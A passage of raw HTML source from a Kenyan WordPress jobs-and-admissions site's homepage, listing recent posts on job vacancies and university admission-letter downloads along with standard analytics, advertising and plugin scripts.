.product_title{font-family:Exo}body,p{font-family:Exo}.td-footer-container::before{background-size:cover}.td-footer-container::before{opacity:.3}</style><meta name="theme-color" content="green"><meta name="msapplication-navbutton-color" content="green"><meta name="apple-mobile-web-app-status-bar-style" content="green"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css"><style type="text/css" id="wp-custom-css">.list-posts{padding-bottom:1px;border-bottom:solid 1px #E5E4E2;padding-top:15px}.td_module_6 .td-post-author-name,.td_module_7 .td-post-author-name,.td_module_8 .td-post-author-name,.td_module_6 .td-post-date,.td_module_7 .td-post-date,.td_module_8 .td-post-date{margin-top:-15px;vertical-align:middle;font-size:8px}.nine-posts{padding-bottom:5px;border-bottom:solid 1px #E5E4E2;padding-top:5px}.td-post-content p,.mce-content-body p,.wpb_text_column p,.comment-content p{margin-bottom:15px}.td-page-content blockquote,.td-post-content blockquote,.wpb_text_column blockquote,.td_block_text_with_title blockquote,.mce-content-body blockquote,.comment-content blockquote{border:1px solid #b3b2b2;border-radius:6px;box-shadow:1px 1px 1px #b3b2b2;background:#ffff99!important;box-shadow:0 8px 8px -6px #333;border:none;border-radius:0;padding:15px 20px 3px 20px;margin:10px 0 15px 0}.td-page-content blockquote p,.td-post-content blockquote p,.wpb_text_column blockquote p,.td_block_text_with_title blockquote p,.mce-content-body blockquote p,.comment-content blockquote p{line-height:1.7;font-weight:400;text-align:left;color:#000;font-style:normal}.blockquote:after,.blockquote:before,blockquote:after,blockquote:before{color:#797979}.blockquote:before,blockquote:before{top:10px;left:5px}.blockquote:after,blockquote:after{content:"\201d";right:5px}.blockquote:before,blockquote:before{content:"\201c";right:5px}.blockquote:after,blockquote:after{bottom:10px;top:auto}.blockquote:after,.blockquote:before,blockquote:after,blockquote:before{display:inline-block;position:absolute;color:#b2b2b2;font-size:30px;line-height:1;font-style:normal;font-family:Arial,Helvetica,sans-serif}.widget_text a{color:#000}.widget a{color:#000}</style><meta name="theme-color" content="green"><meta name="msapplication-navbutton-color" content="green"><meta name="apple-mobile-web-app-status-bar-style" content="green<style id=" tdw-css-placeholder"></style><script async src='https://stats.wp.com/s-201920.js'></script> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script>(adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-6126543707689003", enable_page_level_ads: true });</script></head><body data-rsssl=1 class="home page-template page-template-page-pagebuilder-latest page-template-page-pagebuilder-latest-php page page-id-5417 woocommerce-no-js homepage global-block-template-1 td-animation-stack-type0 td-boxed-layout" itemscope="itemscope" itemtype="https://schema.org/WebPage"><div class="td-scroll-up"><i class="td-icon-menu-up"></i></div><div class="td-menu-background"></div><div id="td-mobile-nav"><div class="td-mobile-container"><div class="td-menu-socials-wrap"><div class="td-menu-socials"> <span class="td-social-icon-wrap"> <a target="_blank" href="https://www.facebook.com/ngnaira" title="Facebook"> <i class="td-icon-font td-icon-facebook"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="https://plus.google.com/+admalic" title="Google+"> <i class="td-icon-font td-icon-googleplus"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="https://www.instagram.com/ngnaira" title="Instagram"> <i class="td-icon-font td-icon-instagram"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="https://twitter.com/ngnaira" title="Twitter"> <i class="td-icon-font td-icon-twitter"></i> </a> </span> <span class="td-social-icon-wrap"> <a target="_blank" href="https://www.youtube.com/user/ngnaira" title="Youtube"> <i class="td-icon-font td-icon-youtube"></i> </a> </span></div><div class="td-mobile-close"> <a href="#"><i class="td-icon-close-mobile"></i></a></div></div><div class="td-mobile-content"><div class="menu-main-menu-container"><ul id="menu-main-menu" class="td-mobile-main-menu"><li id="menu-item-1185" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-has-children menu-item-first menu-item-1185"><a href="https://admalic.co.ke/">Home<i class="td-icon-menu-right td-element-after"></i></a><ul class="sub-menu"><li id="menu-item-1186" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1186"><a href="https://admalic.co.ke/about/">About Us</a></li><li id="menu-item-1187" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1187"><a href="https://admalic.co.ke/contact/">Contact Us</a></li></ul></li><li id="menu-item-1191" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1191"><a href="https://admalic.co.ke/category/opportunities/jobs/">Jobs</a></li><li id="menu-item-1202" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1202"><a href="https://admalic.co.ke/category/education/admissions/">Admissions</a></li><li id="menu-item-1189" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-1189"><a href="https://admalic.co.ke/category/opportunities/">Opportunities<i class="td-icon-menu-right td-element-after"></i></a><ul class="sub-menu"><li id="menu-item-1190" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1190"><a href="https://admalic.co.ke/category/opportunities/careers/">Careers</a></li></ul></li></ul></div></div></div></div><div class="td-search-background"></div><div class="td-search-wrap-mob"><div class="td-drop-down-search" aria-labelledby="td-header-search-button"><form method="get" class="td-search-form" action="https://admalic.co.ke/"><div class="td-search-close"> <a href="#"><i class="td-icon-close-mobile"></i></a></div><div role="search" class="td-search-input"> <span>Search</span> <input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" /></div></form><div id="td-aj-search-mob"></div></div></div><div id="td-outer-wrap"><div class="td-outer-container"><div class="td-header-wrap td-header-style-9"><div class="td-top-menu-full"><div class="td-header-row td-header-top-menu td-make-full"></div></div><div class="td-header-menu-wrap"><div class="td-header-row td-header-border td-header-main-menu"><div class="td-make-full"><div id="td-header-menu" role="navigation"><div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div><div class="td-main-menu-logo td-logo-in-menu"> <a class="td-mobile-logo td-sticky-mobile" href="https://admalic.co.ke/"> <img class="td-retina-data" data-retina="https://admalic.co.ke/wp-content/uploads/2018/04/admalickenyapng-e1542569229953.png" src="https://admalic.co.ke/wp-content/uploads/2018/04/admalickenyapng-e1542569229953.png" alt="Admalic Kenya Logo" title="Admalic Kenya Logo" /> </a><h1 class="td-logo"> <a class="td-header-logo td-sticky-mobile" href="https://admalic.co.ke/"> <img class="td-retina-data" data-retina="https://admalic.co.ke/wp-content/uploads/2018/04/admalickenyapng-e1542569229953.png" src="https://admalic.co.ke/wp-content/uploads/2018/04/admalickenyapng-e1542569229953.png" alt="Admalic Kenya Logo" title="Admalic Kenya Logo" /> <span class="td-visual-hidden">Admalic Kenya</span> </a></h1></div><div class="menu-main-menu-container"><ul id="menu-main-menu-1" class="sf-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-has-children menu-item-first td-menu-item td-normal-menu menu-item-1185"><a href="https://admalic.co.ke/">Home</a><ul class="sub-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-1186"><a href="https://admalic.co.ke/about/">About Us</a></li><li class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-1187"><a href="https://admalic.co.ke/contact/">Contact Us</a></li></ul></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1191"><a href="https://admalic.co.ke/category/opportunities/jobs/">Jobs</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1202"><a href="https://admalic.co.ke/category/education/admissions/">Admissions</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-1189"><a href="https://admalic.co.ke/category/opportunities/">Opportunities</a><ul class="sub-menu"><li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-1190"><a href="https://admalic.co.ke/category/opportunities/careers/">Careers</a></li></ul></li></ul></div></div><div class="td-search-wrapper"><div id="td-top-search"><div class="header-search-wrap"><div class="dropdown header-search"> <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a> <a id="td-header-search-button-mob" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a></div></div></div></div><div class="header-search-wrap"><div class="dropdown header-search"><div class="td-drop-down-search" aria-labelledby="td-header-search-button"><form method="get" class="td-search-form" action="https://admalic.co.ke/"><div role="search" class="td-head-form-search-wrap"> <input class="needsclick" id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" /></div></form><div id="td-aj-search"></div></div></div></div></div></div></div><div class="td-header-container"><div class="td-header-row"><div class="td-header-sp-rec"><div class="td-header-ad-wrap td-ad"><div class='code-block code-block-4' style='margin: 8px auto; text-align: center; display: block; clear: both;'> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-6126543707689003" data-ad-slot="4700438479" data-ad-format="link"></ins> <script>(adsbygoogle = window.adsbygoogle || []).push({});</script> </center></div></div></div></div></div></div><div class="td-main-content-wrap td-main-page-wrap td-container-wrap"><div class="td-container td-pb-article-list "><div class="td-container-border"><div class="td-pb-row"><div class="td-pb-span8 td-main-content" role="main"><div class="td-ss-main-content"><h4 class="block-title"><span>RECENT NOTIFICATIONS</span></h4><div class="td-block-row"><div class="td-block-span6"><div class="td_module_9 td_module_wrap td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/high-commission-of-canada-in-kenya-job-2/" rel="bookmark" title="High Commission of Canada in Kenya Job Vacancy 2019 for Maintenance Technician">High Commission of Canada in Kenya Job Vacancy 2019 for Maintenance Technician</a></h3><div class="meta-info"></div></div></div></div><div class="td-block-span6"><div class="td_module_9 td_module_wrap td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/high-commission-of-canada-in-kenya-job/" rel="bookmark" title="High Commission of Canada in Kenya Job Vacancy 2019 for Handyman">High Commission of Canada in Kenya Job Vacancy 2019 for Handyman</a></h3><div class="meta-info"></div></div></div></div></div><div class="td-block-row"><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/kenya-universities-kuccps-admission-letters-download-portal/" rel="bookmark" title="2019/2020 Kenya Universities KUCCPS Admission Letters Download Portal">2019/2020 Kenya Universities KUCCPS Admission Letters Download Portal</a></h3><div class="meta-info"></div></div></div></div><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-kuccps-admission-letter/" rel="bookmark" title="How to Download KUCCPS 2019/2020 Admission Letter in PDF">How to Download KUCCPS 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div></div><div class="td-block-row"><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-anu-admission-letter/" rel="bookmark" title="How to Download ANU 2019/2020 Admission Letter in PDF">How to Download ANU 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-kuc-admission-letter/" rel="bookmark" title="How to Download KUC 2019/2020 Admission Letter in PDF">How to Download KUC 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div></div><div class="td-block-row"><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-kenya-school-of-law-admission-letter/" rel="bookmark" title="How to Download Kenya School of Law 2019/2020 Admission Letter in PDF">How to Download Kenya School of Law 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-eldoret-polytechnic-admission-letter/" rel="bookmark" title="How to Download Eldoret Polytechnic 2019/2020 Admission Letter in PDF">How to Download Eldoret Polytechnic 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div></div><div class="td-block-row"><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-university-of-kabianga-admission-letter/" rel="bookmark" title="How to Download University of Kabianga 2019/2020 Admission Letter in PDF">How to Download University of Kabianga 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-tum-admission-letter/" rel="bookmark" title="How to Download TUM 2019/2020 Admission Letter in PDF">How to Download TUM 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div></div><div class="td-block-row"><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-laikipia-university-admission-letter/" rel="bookmark" title="How to Download Laikipia University 2019/2020 Admission Letter in PDF">How to Download Laikipia University 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-ueab-admission-letter/" rel="bookmark" title="How to Download UEAB 2019/2020 Admission Letter in PDF">How to Download UEAB 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div></div><div class="td-block-row"><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-maasai-mara-university-admission-letter/" rel="bookmark" title="How to Download Maasai Mara University 2019/2020 Admission Letter in PDF">How to Download Maasai Mara University 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-university-of-embu-admission-letter/" rel="bookmark" title="How to Download University of Embu 2019/2020 Admission Letter in PDF">How to Download University of Embu 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div></div><div class="td-block-row"><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-kca-admission-letter/" rel="bookmark" title="How to Download KCA 2019/2020 Admission Letter in PDF">How to Download KCA 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-zetech-university-admission-letter/" rel="bookmark" title="How to Download Zetech University 2019/2020 Admission Letter in PDF">How to Download Zetech University 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div></div><div class="td-block-row"><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-kisii-university-admission-letter/" rel="bookmark" title="How to Download Kisii University 2019/2020 Admission Letter in PDF">How to Download Kisii University 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-cuea-admission-letter/" rel="bookmark" title="How to Download CUEA 2019/2020 Admission Letter in PDF">How to Download CUEA 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div></div><div class="td-block-row"><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-kemu-admission-letter/" rel="bookmark" title="How to Download KEMU 2019/2020 Admission Letter in PDF">How to Download KEMU 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div><div class="td-block-span6"><div class="td_module_9 td_module_wrap td_module_no_thumb td-meta-info-hide"><div class="item-details"><h3 class="entry-title td-module-title"><a href="https://admalic.co.ke/how-to-download-usiu-admission-letter/" rel="bookmark" title="How to Download USIU 2019/2020 Admission Letter in PDF">How to Download USIU 2019/2020 Admission Letter in PDF</a></h3><div class="meta-info"></div></div></div></div></div><div class="page-nav td-pb-padding-side"><span class="current">1</span><a href="https://admalic.co.ke/page/2/" class="page" title="2">2</a><a href="https://admalic.co.ke/page/3/" class="page" title="3">3</a><span class="extend">...</span><a href="https://admalic.co.ke/page/341/" class="last" title="341">341</a><a href="https://admalic.co.ke/page/2/"><i class="td-icon-menu-right"></i></a><span class="pages">Page 1 of 341</span><div class="clearfix"></div></div></div></div><div class="td-pb-span4 td-main-sidebar" role="complementary"><div class="td-ss-main-sidebar"><aside class="td_block_template_1 widget widget_search"><h4 class="block-title"><span>Search Anything You Need</span></h4><form method="get" class="td-search-form-widget" action="https://admalic.co.ke/"><div role="search"> <input class="td-widget-search-input" type="text" value="" name="s" id="s" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="searchsubmit" value="Search" /></div></form></aside><aside class="td_block_template_1 widget widget_categories"><h4 class="block-title"><span>Browse Categories:</span></h4><form action="https://admalic.co.ke" method="get"><label class="screen-reader-text" for="cat">Browse Categories:</label><select name='cat' id='cat' class='postform'><option value='-1'>Select Category</option><option class="level-0" value="11245">Articles</option><option class="level-0" value="28639">Business</option><option class="level-0" value="5059">Deadlines</option><option class="level-0" value="6">Education</option><option class="level-1" value="6579">&nbsp;&nbsp;&nbsp;Academic Calender</option><option class="level-1" value="12">&nbsp;&nbsp;&nbsp;Admissions</option><option class="level-2" value="35202">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Admission Forms</option><option class="level-2" value="14161">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Admission Letters</option><option class="level-2" value="18855">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Admission Lists</option><option class="level-2" value="22389">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Admission Requirements</option><option class="level-2" value="13070">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Intakes</option><option class="level-1" value="31777">&nbsp;&nbsp;&nbsp;Application Forms</option><option class="level-1" value="11287">&nbsp;&nbsp;&nbsp;Campus News</option><option class="level-1" value="24827">&nbsp;&nbsp;&nbsp;Contact</option><option class="level-1" value="7">&nbsp;&nbsp;&nbsp;Courses</option><option class="level-1" value="25178">&nbsp;&nbsp;&nbsp;Graduation</option><option class="level-1" value="39922">&nbsp;&nbsp;&nbsp;HELB</option><option class="level-1" value="11348">&nbsp;&nbsp;&nbsp;KNEC</option><option class="level-2" value="11349">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;KCSE</option><option class="level-1" value="11347">&nbsp;&nbsp;&nbsp;KUCCPS</option><option class="level-1" value="31653">&nbsp;&nbsp;&nbsp;Online Application</option><option class="level-1" value="7442">&nbsp;&nbsp;&nbsp;Opening Date</option><option class="level-1" value="41819">&nbsp;&nbsp;&nbsp;Past Papers</option><option class="level-2" value="41820">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;KCSE</option><option class="level-1" value="9">&nbsp;&nbsp;&nbsp;Portal</option><option class="level-1" value="13104">&nbsp;&nbsp;&nbsp;Postgraduate</option><option class="level-1" value="12994">&nbsp;&nbsp;&nbsp;Prospectus</option><option class="level-1" value="36446">&nbsp;&nbsp;&nbsp;Results</option><option class="level-1" value="7270">&nbsp;&nbsp;&nbsp;school fee</option><option class="level-1" value="11">&nbsp;&nbsp;&nbsp;School Fees</option><option class="level-1" value="1234">&nbsp;&nbsp;&nbsp;Timetable</option><option class="level-1" value="46255">&nbsp;&nbsp;&nbsp;Website</option><option class="level-0" value="25181">Fellowships</option><option class="level-0" value="6376">Internships</option><option class="level-0" value="13288">Knowledge Base</option><option class="level-1" value="18052">&nbsp;&nbsp;&nbsp;Biography</option><option class="level-1" value="17248">&nbsp;&nbsp;&nbsp;Embassies in Kenya</option><option class="level-1" value="18234">&nbsp;&nbsp;&nbsp;Satellite TV</option><option class="level-1" value="18030">&nbsp;&nbsp;&nbsp;SportPesa</option><option class="level-1" value="22834">&nbsp;&nbsp;&nbsp;Visa</option><option class="level-0" value="3">Opportunities</option><option class="level-1" value="10">&nbsp;&nbsp;&nbsp;Careers</option><option class="level-1" value="4">&nbsp;&nbsp;&nbsp;Jobs</option><option class="level-1" value="13225">&nbsp;&nbsp;&nbsp;National Recruitments</option><option class="level-1" value="44268">&nbsp;&nbsp;&nbsp;Recruitment Portal</option><option class="level-1" value="6619">&nbsp;&nbsp;&nbsp;Scholarships</option><option class="level-1" value="14571">&nbsp;&nbsp;&nbsp;Shortlisted</option><option class="level-0" value="1">Others</option><option class="level-0" value="13624">Requirements</option><option class="level-0" value="11244">Technology</option><option class="level-1" value="18092">&nbsp;&nbsp;&nbsp;Laptops</option><option class="level-1" value="18153">&nbsp;&nbsp;&nbsp;Mobile Phones</option><option class="level-2" value="38454">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Infinix</option><option class="level-2" value="39231">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Samsung</option><option class="level-2" value="38893">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Tecno</option><option class="level-1" value="17861">&nbsp;&nbsp;&nbsp;TV</option><option class="level-0" value="11246">Wishes &amp; Quotes</option> </select></form> <script type='text/javascript'>/* <![CDATA[ */ (function() { var dropdown = document.getElementById( "cat" ); function onCatChange() { if ( dropdown.options[ dropdown.selectedIndex ].value > 0 ) { dropdown.parentNode.submit(); } } dropdown.onchange = onCatChange; })(); /* ]]> */</script> </aside></div></div></div></div></div></div><div class="td-footer-container td-container"><div class="td-pb-row"><div class="td-pb-span12"></div></div><div class="td-pb-row"><div class="td-pb-span12"></div></div></div><div class="td-sub-footer-container td-container td-container-border "><div class="td-pb-row"><div class="td-pb-span8 td-sub-footer-menu"><div class="td-pb-padding-side"><div class="menu-footer-menu-container"><ul id="menu-footer-menu" class="td-subfooter-menu"><li id="menu-item-6240" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-first td-menu-item td-normal-menu menu-item-6240"><a href="/" aria-current="page">Home</a></li><li id="menu-item-6237" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-6237"><a href="https://admalic.co.ke/about/">About Us</a></li><li id="menu-item-6238" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-6238"><a href="https://admalic.co.ke/contact/">Contact Us</a></li><li id="menu-item-6239" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy td-menu-item td-normal-menu menu-item-6239"><a href="https://admalic.co.ke/privacy-policy/">Privacy Policy</a></li></ul></div></div></div><div class="td-pb-span4 td-sub-footer-copy"><div class="td-pb-padding-side"> &copy; 2018 NGNaira.com by Admalic Inc. All rights reserved.</div></div></div></div></div></div> <script>(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-75121335-13', 'auto'); ga('send', 'pageview');</script> <div style="display:none"></div> <script type="text/javascript">var c = document.body.className; c = c.replace(/woocommerce-no-js/, 'woocommerce-js'); document.body.className = c;</script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/photon/photon.min.js' defer></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920' defer></script> <script type='text/javascript'>/* <![CDATA[ */ var tocplus = {"smooth_scroll":"1","visibility_show":"show","visibility_hide":"hide","width":"Auto"}; /* ]]> */</script> <script type='text/javascript' src='https://admalic.co.ke/wp-content/cache/busting/1/wp-content/plugins/table-of-contents-plus/front.min-1509.js' defer></script> <script type='text/javascript'>/* <![CDATA[ */ var thirsty_global_vars = {"home_url":"\/\/admalic.co.ke","ajax_url":"https:\/\/admalic.co.ke\/wp-admin\/admin-ajax.php","link_fixer_enabled":"yes","link_prefix":"go","link_prefixes":["recommends","go"],"post_id":"5417","enable_record_stats":"yes","enable_js_redirect":"yes","disable_thirstylink_class":""}; /* ]]> */</script> <script type='text/javascript' src='https://admalic.co.ke/wp-content/cache/busting/1/wp-content/plugins/thirstyaffiliates/js/app/ta-3.8.js' defer></script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.6.2/assets/js/jquery-blockui/jquery.blockUI.min.js' defer></script> <script type='text/javascript'>/* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/admalic.co.ke\/cart\/","is_cart":"","cart_redirect_after_add":"yes"}; /* ]]> */</script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.6.2/assets/js/frontend/add-to-cart.min.js' defer></script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.6.2/assets/js/js-cookie/js.cookie.min.js' defer></script> <script type='text/javascript'>/* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; /* ]]> */</script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.6.2/assets/js/frontend/woocommerce.min.js' defer></script> <script type='text/javascript'>/* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_14dce323e364b782ab05bacff7fb14cd","fragment_name":"wc_fragments_14dce323e364b782ab05bacff7fb14cd","request_timeout":"5000"}; /* ]]> */</script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.6.2/assets/js/frontend/cart-fragments.min.js' defer></script> <script type='text/javascript'>jQuery( 'body' ).bind( 'wc_fragments_refreshed', function() { jQuery( 'body' ).trigger( 'jetpack-lazy-images-load' ); } );</script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Mayaa' defer></script> <script type='text/javascript'>/* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */</script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/modules/wpgroho.js' defer></script> <script type='text/javascript' src='https://admalic.co.ke/wp-content/cache/busting/1/wp-content/themes/Newsmag/js/tagdiv_theme.min-4.7.js' defer></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/comment-reply.min.js' defer></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/likes/queuehandler.min.js' defer></script> <script>(function(){ var html_jquery_obj = jQuery('html'); if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) { var path = 'https://admalic.co.ke/wp-content/themes/Newsmag-child/style.css'; jQuery.get(path, function(data) { var str_split_separator = '#td_css_split_separator'; var arr_splits = data.split(str_split_separator); var arr_length = arr_splits.length; if (arr_length > 1) { var dir_path = 'https://admalic.co.ke/wp-content/themes/Newsmag'; var splited_css = ''; for (var i = 0; i < arr_length; i++) { if (i > 0) { arr_splits[i] = str_split_separator + ' ' + arr_splits[i]; } //jQuery('head').append('<style>' + arr_splits[i] + '</style>'); var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) { return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,''); }); splited_css += "<style>" + formated_str + "</style>"; } var td_theme_css = jQuery('link#td-theme-css'); if (td_theme_css.length) { td_theme_css.after(splited_css); } } }); } })();</script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'>_stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3.1',blog:'155100541',post:'5417',tz:'1',srv:'admalic.co.ke'} ]); _stq.push([ 'clickTrackerInit', '155100541', '5417' ]);</script> <div id="tdw-css-writer" style="display: none" class="tdw-drag-dialog tdc-window-sidebar"><header> <a title="Editor" class="tdw-tab tdc-tab-active" href="#" data-tab-content="tdw-tab-editor">Edit with Live CSS</a><div class="tdw-less-info" title="This will be red when errors are detected in your CSS and LESS"></div></header><div class="tdw-content"><div class="tdw-tabs-content tdw-tab-editor tdc-tab-content-active"> <script>(function(jQuery, undefined) { jQuery(window).ready(function() { if ( 'undefined' !== typeof tdcAdminIFrameUI ) { var 